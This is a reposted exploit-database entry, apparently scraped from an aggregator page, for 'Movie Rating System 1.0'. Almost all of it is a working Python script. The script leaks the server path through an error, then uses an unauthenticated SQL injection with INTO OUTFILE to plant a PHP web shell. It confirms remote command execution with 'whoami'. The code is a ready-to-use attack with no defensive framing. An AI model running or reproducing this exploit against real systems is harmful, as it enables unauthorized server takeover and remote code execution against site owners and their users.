[webapps] Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)

2 years ago 167
BOOK THIS SPACE FOR AD
ARTICLE AD
# Exploit Title: Movie Rating System 1.0 - SQLi to RCE (Unauthenticated) # Date: 22/12/2021 # Exploit Author: Tagoletta (Tağmaç) # Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html # Version: 1.0 # Tested on: Ubuntu # This exploit only works correctly if user is database administrator. if not user is database administrator, continue with sql injection payloads. import requests import random import string from bs4 import BeautifulSoup url = input("TARGET = ") if not url.startswith('http://') and not url.startswith('https://'): url = "http://" + url if not url.endswith('/'): url = url + "/" payload = "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>" let = string.ascii_lowercase shellname = ''.join(random.choice(let) for i in range(15)) resp = requests.get(url) htmlParser = BeautifulSoup(resp.text, 'html.parser') getMenu = htmlParser.findAll("a", {"class": "nav-link"}) selectPage = "" for i in getMenu: if "movie" in i.text.lower(): selectPage = i["href"] break selectPage = selectPage.replace("./","") findSql = url + selectPage resp = requests.get(findSql) htmlParser = BeautifulSoup(resp.text, 'html.parser') movieList = htmlParser.findAll("a", {"class" : "card card-outline card-primary shadow rounded-0 movie-item text-decoration-none text-dark"}) sqlPage = movieList[0]["href"] sqlPage = sqlPage.replace("./","") sqlPage = url + sqlPage print("\nFinding path") findPath = requests.get(sqlPage + '\'') findPath = findPath.text[findPath.text.index("<b>Warning</b>: ")+17:findPath.text.index("</b> on line ")] findPath = findPath[findPath.index("<b>")+3:len(findPath)] print("injection page: "+sqlPage) parser = findPath.split('\\') parser.pop() findPath = "" for find in parser: findPath += find + "/" print("\nFound Path : " + findPath) SQLtoRCE = "-1881' OR 1881=1881 LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -" SQLtoRCE = SQLtoRCE.replace("#PATH#",findPath+shellname+".php") SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex()) print("\n\nShell Uploading...") status = requests.get(sqlPage+SQLtoRCE) shellOutput = requests.get(url+shellname+".php?tago=whoami") print("\n\nShell Output : "+shellOutput.text) print("\nShell Path : " + url+shellname+".php")
Read Entire Article